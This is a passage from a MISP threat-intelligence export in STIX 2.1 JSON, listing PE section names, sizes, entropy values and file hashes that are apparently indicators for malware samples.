"uuid" : "efa13f3c-4693-4a33-b9b1-933aff8436ec"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "c67a629ab7662575eb6eac1c4e0a5daaffefdb15" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "6866de3c-4f27-4faf-b4e9-2aec6ab16222"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "c5cb63c83c121d594c360584caf2a30fe7c5bed096d1abc5f9116e1e4f8113e0" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "71cb2ef1-4b3f-4c77-b912-7a78eefc8a1a"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "77143be8adb6e39cbdc21e8d9458d3fe6ffc36ebd9aa764e7b9e1e6e6e77eb6240fae09c2b321ea45dab580639b7766a1262b36499b0a75a90b81e0b55dae1ba" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "295f465b-62ea-43c6-8c60-41cf82e98820"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "1536:8lnx8E/msg8/rWJWVPRENX/HJSz+t95r49XAkr+it+a:gnxxgSrYGRQJSwrru" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "d5561dc5-6e15-4b06-9c39-5aff4909045c"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--30d4ea8b-bb35-4cc9-aa4d-b95f65834786" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:03:50.000Z" ,
"modified" : "2020-07-15T20:03:50.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rsrc" ,
"category" : "Other" ,
"uuid" : "6bdc308a-64c9-4365-8af4-6fcecc71d572"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "4096" ,
"category" : "Other" ,
"uuid" : "27f5226b-29e3-4d36-814e-92917d4d555b"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "3.3548995614289" ,
"category" : "Other" ,
"uuid" : "fea91540-ab3a-41e2-87c5-dea257aede25"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "f3cf17707906ead98cbc9697b3b73c5f" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "7c8a4b53-3bb3-4324-8756-6fe35a8cc64a"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "8c280ae153325f85cd4a869f8116e9e3df0dc812" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "62471cbc-61e2-45d1-aefa-6f9d3d4c243f"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "69aff97d63b9f106ab4b318358d260968629056e693f19f01e5001d023fb1f86" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "f352baed-150a-4ff4-8745-0c274900bf0a"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "6f52b4198600889d50961a88446854ab1e7dd877c2c91f2a39a3052b4059e2ff31ae6ac9a82d5777e4fe84d18598abcd0200b1f3e4449e34b9c1d191935d57b8" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "57726d99-3ff8-4331-9c22-fb9cc3c30762"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "12:E71i3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:TA1YFSlel1NzHN/m93Jl/KPN3ND" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "26d752ad-7355-4070-8ccd-b09642a166c1"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--65b78289-00e3-405f-a669-e21c4b240aff" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:05:10.000Z" ,
"modified" : "2020-07-15T20:05:10.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".reloc" ,
"category" : "Other" ,
"uuid" : "f3c0c1bf-c85a-4ba4-99a5-0373d70552cc"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "4096" ,
"category" : "Other" ,
"uuid" : "33f360e2-e3f4-4474-9fa2-fe385c72ac96"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "5.8403314710145" ,
"category" : "Other" ,
"uuid" : "965fd0bc-6b1c-418d-9c6a-419cb3ea8ad8"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "1b5b73978c9dd2b41ffb6503bbce8fa5" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "68d5f823-7a9f-4c5e-9ee5-59326f0edc3e"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "8902587665c7be53c1803817feebd8982a1fce88" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "7d949797-4652-4952-837c-fdb19b0654d8"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "4de7524bab0b1ee28e73af784430877e43359840645dd5382d9387f758a710c1" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "de7fa0ae-9b23-466f-b477-e2061ffca952"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "c9c576f04fe09bfea4e965418cf08009a4f41f3d29529ece5827ebf6f66b1a879211ca4e7e8e046cde9238bb09ebba817dd5ec92f1442483ef613c062e6a79fa" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "13d0a6df-7d20-44c6-8289-475d62e967a6"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "12:/qtWjpmzSlZzY1zwkUdU0UX0rojXU84jv:/qkQ2lZzY1zwDCfjX3cv" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "60b6d300-9272-4596-a355-fd46e2f39e51"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--5e30f0a7-f2e0-4669-aadd-6ef0de574e31" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:39:23.000Z" ,
"modified" : "2020-08-02T18:39:23.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rdar" ,
"category" : "Other" ,
"uuid" : "e2ec184c-a31f-4ade-ae4c-642a7e65c614"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "12288" ,
"category" : "Other" ,
"uuid" : "a9d9c4fb-0f1b-4da7-b648-4b4076d6a949"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "6.6775358173282" ,
"category" : "Other" ,
"uuid" : "ba24c52b-8652-4f97-8f8a-eac7066f35da"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "942ccd316a0ee518903e4835680d1881" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "ff4673d1-baae-4215-97d6-98ea38fa85c8"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "2e960d47a58b00b89755ed2508b9f135ed2e8b0f" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "20c7e874-c65d-43ce-9182-19767af29a96"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "d37eb200b879977cc9d521c0e79f759e358eff1c8de745e19e4acd98f968abe5" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "3bb74816-35df-4e00-ac7b-27600b25cb8f"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "49d5c3d54d723f6b6360c70f18e1ea62181a26ad05e47d73931651bb1447dab7cc6b6fabbfe7f1b7f127248221f948abe984879096276cd62d7f176b5eb74841" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "2acebc68-ac24-4142-bb8b-2153327f78f1"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "192:csV5kuYL8L9ROTkx5Ih8pbtaSzCbBJ0zHrDy0tD44KRt26LLYRdTuY:pyFq9I+5Ih8pcSGbBJgnFtkdfC3" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "e28799f0-ca4d-4387-8d3e-cbf555c37642"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--b1dddcb3-12d4-4c3d-90f1-3b76ca3c2867" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:40:16.000Z" ,
"modified" : "2020-08-02T18:40:16.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rdar" ,
"category" : "Other" ,
"uuid" : "731fc26b-ca0f-4128-9341-4c50111efd41"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "12288" ,
"category" : "Other" ,
"uuid" : "de439331-8add-4208-b003-2d4d8e2150dd"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "6.6775358173282" ,
"category" : "Other" ,
"uuid" : "fd66d66c-ac27-4030-a798-a7e93b0a541a"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "942ccd316a0ee518903e4835680d1881" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "a6b0963f-0575-4067-af56-b7058a2b5b99"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "2e960d47a58b00b89755ed2508b9f135ed2e8b0f" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "a33a4b9f-31ce-45ec-a5f9-47f1ffc98384"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "d37eb200b879977cc9d521c0e79f759e358eff1c8de745e19e4acd98f968abe5" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "2ae21ea6-f77c-47dc-9c88-f7da7c38992d"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "49d5c3d54d723f6b6360c70f18e1ea62181a26ad05e47d73931651bb1447dab7cc6b6fabbfe7f1b7f127248221f948abe984879096276cd62d7f176b5eb74841" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "9fbefbb9-f09a-4010-a067-9088c46604f1"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "192:csV5kuYL8L9ROTkx5Ih8pbtaSzCbBJ0zHrDy0tD44KRt26LLYRdTuY:pyFq9I+5Ih8pcSGbBJgnFtkdfC3" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "4e4b35a9-f9fc-4fb9-9833-75c2b261c0d9"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--cda02ce6-6495-448b-a881-94dd8b6ea251" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:40:23.000Z" ,
"modified" : "2020-08-02T18:40:23.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rdata" ,
"category" : "Other" ,
"uuid" : "7bf0f1c8-9605-4195-a8b3-6e6ea32eade6"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "118784" ,
"category" : "Other" ,
"uuid" : "bc1cbecc-7502-43c0-b231-5802452feee3"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "7.9900939465467" ,
"category" : "Other" ,
"uuid" : "141fcc00-e7da-40f0-ab02-d471bad2c443"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "55969439752184b954d17e57a02ead13" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "e1fb44e1-479d-4e34-87d2-f3ba9ec79ecd"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "630de8954270ef5ac062e63d1f0a357bf27c59e3" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "680dee4f-fbb9-4410-ab4c-6298a791bb19"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "93f72412919f3d0ce53152244f64e558ba5e094db5af788e14fc9e057bddb705" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "81470ab2-aff0-425a-97ad-55f1b4896bb9"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "1c7aee1757dee98b1cf9f0b91a0cc071b06aad64d2bd93d686079f64c35c473f28066cf1b24e93b53955075103c4759d8b2c28dfb24118f2f5eeeeaa6408c8fc" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "f2f20b2d-cb5c-4781-b3c5-c7fdde33fde3"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "3072:R+wkQzOkYHYAl6+K6BGiTcp1N3zWz6z+3Gy98+5G6:RJkuYHxK6BGiK1kz6q3Gy+2G6" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "6e091a0c-0855-40f7-add2-6c80515b795f"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--2b213ae5-83b6-4e62-b2e9-bb58a3375ef2" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:41:25.000Z" ,
"modified" : "2020-08-02T18:41:25.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rdata" ,
"category" : "Other" ,
"uuid" : "a1c86d9f-897f-48a9-a8c5-327bce630d35"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "118784" ,
"category" : "Other" ,
"uuid" : "10e6d201-dd9b-45ee-aaf8-4d1d3c0df088"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "7.9900939465467" ,
"category" : "Other" ,
"uuid" : "4e70dba5-9b88-4a31-9711-54b25fdecaea"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "55969439752184b954d17e57a02ead13" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "5633014a-2883-4ad0-8ac8-609587d28d3a"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "630de8954270ef5ac062e63d1f0a357bf27c59e3" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "0b9dc2cf-1584-45b6-a6e3-652b330875b6"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "93f72412919f3d0ce53152244f64e558ba5e094db5af788e14fc9e057bddb705" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "e4a7253c-94bd-487d-a995-d65988be8b06"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "1c7aee1757dee98b1cf9f0b91a0cc071b06aad64d2bd93d686079f64c35c473f28066cf1b24e93b53955075103c4759d8b2c28dfb24118f2f5eeeeaa6408c8fc" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "5fc5c62c-d808-427f-b7fc-8ce4776bf62e"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "3072:R+wkQzOkYHYAl6+K6BGiTcp1N3zWz6z+3Gy98+5G6:RJkuYHxK6BGiK1kz6q3Gy+2G6" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "ed4b4255-a9ce-4c32-8ed6-259f5059c932"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--3a117e2f-ba72-4253-aae3-e47373b3b29f" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:41:47.000Z" ,
"modified" : "2020-08-02T18:41:47.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".data" ,
"category" : "Other" ,
"uuid" : "2ab03bf0-15e4-4eb2-af30-92242bf54ffb"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "69632" ,
"category" : "Other" ,
"uuid" : "000942ea-74e1-43dd-959b-066f96704a0f"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "7.8568053112406" ,
"category" : "Other" ,
"uuid" : "97ca357e-b6b9-46c8-b15a-6008a5b3208b"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "c59b7c6bdf6d3b6475e830d444c16279" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "017f1fee-7052-44ab-a44e-fef1ea8029a6"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "4228bd6f4751581bcd745a808244e531568aba61" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "2276cac0-c9a4-4267-b95d-da9ead48dd8a"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "34dc4e6d66d1836458c99598e7d71ee34485361eaec6f64bd7044e8555f32717" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "8142c5b2-a53b-4128-98e8-ea2ba4436b4c"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "2142d7976cd54482c184e4e022fd22431829450dd7429e6f50ee97fc36f75ca284dc0c5d19c9bf25199afff4a9764013240b7a69dd2f3f0f32746363e89ba20b" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "fec67a7c-092d-4a82-b7eb-064c8bca18d9"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "1536:rzLybGpQ1aURuDvZh8/cODJtX00PIpwkfkNHkLFYz9AHJxOV:byv1aUo8/cONqbwkfwWuzSpxY" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "5f0ed13d-ba7c-460f-83bc-03d21be6ef6e"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--78fb4f68-a212-4ba1-af11-4943011c012c" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:43:00.000Z" ,
"modified" : "2020-08-02T18:43:00.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".data" ,
"category" : "Other" ,
"uuid" : "ee88ca61-1273-40df-b15e-7c1cef7a5422"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "69632" ,
"category" : "Other" ,
"uuid" : "ae6080f0-382a-4d2e-b54b-78bbbfd6db95"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "7.8568053112406" ,
"category" : "Other" ,
"uuid" : "8f146a4a-41de-41f6-bae9-4a6a1f266488"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "c59b7c6bdf6d3b6475e830d444c16279" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "be5d5eba-b42b-4d77-88c9-200eee1782a3"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "4228bd6f4751581bcd745a808244e531568aba61" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "28495c52-a066-4c3e-9c80-e4c498da2333"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "34dc4e6d66d1836458c99598e7d71ee34485361eaec6f64bd7044e8555f32717" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "7533d176-2922-49e4-91b5-50db38c441f8"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "2142d7976cd54482c184e4e022fd22431829450dd7429e6f50ee97fc36f75ca284dc0c5d19c9bf25199afff4a9764013240b7a69dd2f3f0f32746363e89ba20b" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "959e75c1-5c91-4246-9ef3-f79bad253842"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "1536:rzLybGpQ1aURuDvZh8/cODJtX00PIpwkfkNHkLFYz9AHJxOV:byv1aUo8/cONqbwkfwWuzSpxY" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "bb826f80-d656-4650-ad25-5871e58a5699"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--47b6935a-b4bd-4045-b600-c0a4213d3ec1" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:43:24.000Z" ,
"modified" : "2020-08-02T18:43:24.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rsrc" ,
"category" : "Other" ,
"uuid" : "992e2373-7cf4-4f4a-98a1-2fae9ceeb893"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "4096" ,
"category" : "Other" ,
"uuid" : "1c84aa0f-d3cb-4f9d-bd33-a530c005aa02"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "3.3542400671361" ,
"category" : "Other" ,
"uuid" : "51647ac3-e887-4fef-b56e-dc9a3cafd699"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "fcd1605d1d9f49547d0d1a001563946a" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "8a766358-7028-4969-8feb-c5542a366574"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "ac720c8a08e4fb15215b7d2f5181f301a4bdb075" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "6ee6d0a6-f0dd-430c-98b8-6b6b8c369f52"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "fbc87ccc890a8aaf2b8ded06c06da035589d67aaf9ee94e3e9b192c29e38b919" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "e2f9f32d-4c2c-43c4-bac7-c428469b6743"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "02fae2452b2262e7cffb798070ffd18e581664abe975738e1bbdbd6158fc73f48b7753eb5addf74715667a63e0e236d32a66daa47037ac305e7d4bf0e2e73257" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "a9a39f3a-fbc1-436f-8c00-e46953d761d2"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "12:E7li3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:jA1YFSlel1NzHN/m93Jl/KPN3ND" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "1de2af3c-0377-4636-914c-2b99e6e53694"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--0dbb4f9b-5415-4aba-b478-3ae76496cbc0" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:44:24.000Z" ,
"modified" : "2020-08-02T18:44:24.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rsrc" ,
"category" : "Other" ,
"uuid" : "aea237dc-3990-42c9-a520-c16735707264"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "4096" ,
"category" : "Other" ,
"uuid" : "f9e63bb3-b550-44da-bb6e-c5273377f0a5"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "3.3542400671361" ,
"category" : "Other" ,
"uuid" : "43db1d82-3c06-4b43-be0d-ebd732243699"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "fcd1605d1d9f49547d0d1a001563946a" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "52d1185b-7538-4358-bf79-3a8df1aece8c"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "ac720c8a08e4fb15215b7d2f5181f301a4bdb075" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "8aa6dd94-f17b-43f8-8cb0-2194177bcd83"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "fbc87ccc890a8aaf2b8ded06c06da035589d67aaf9ee94e3e9b192c29e38b919" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "c3dc63c7-0999-4fa9-b354-9714660470f5"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "02fae2452b2262e7cffb798070ffd18e581664abe975738e1bbdbd6158fc73f48b7753eb5addf74715667a63e0e236d32a66daa47037ac305e7d4bf0e2e73257" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "4b1faca7-16d1-4fb2-a34a-c2ce3323da95"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "12:E7li3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:jA1YFSlel1NzHN/m93Jl/KPN3ND" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "75cfed24-ec5f-4065-8335-37cb548fb06a"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--ae062334-3a88-45b4-9331-ed9a80fc7218" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:45:01.000Z" ,
"modified" : "2020-08-02T18:45:01.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".reloc" ,
"category" : "Other" ,
"uuid" : "06dea17e-b60d-4211-8f31-8f036cfba40b"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "4096" ,
"category" : "Other" ,
"uuid" : "0de40bf8-81df-4961-86c9-4e16ff2e15e2"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "5.9461169615076" ,
"category" : "Other" ,
"uuid" : "a3ca1adf-67fa-42a8-96c1-f3cfc983eb3c"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "2e582f4b09f310087abc12cfbf505d06" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "6b061b3f-634c-4229-a9d8-cc8979311f1e"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "1d6c92f1a273c02c810e23d72d1458a6fd46fec1" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "c36c52f0-0ec1-4749-a2e1-9f2fe1fbac00"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "dfb20edeecfc08005057b151980ea753dc1ed39876ff71499e877da63ad7dd9f" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "1018c326-f42a-4ada-bee0-6753036899c8"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "9af255d70ca398f69215ad8f2549e85eafe5d61642439ddd1bf1bb298cf503945de2bf383323ddd3134ab5c1118f55b829a899cc9cfdc03b31c57d50914a5107" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "5307695d-e49d-42bc-98d1-3c309fb668ce"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
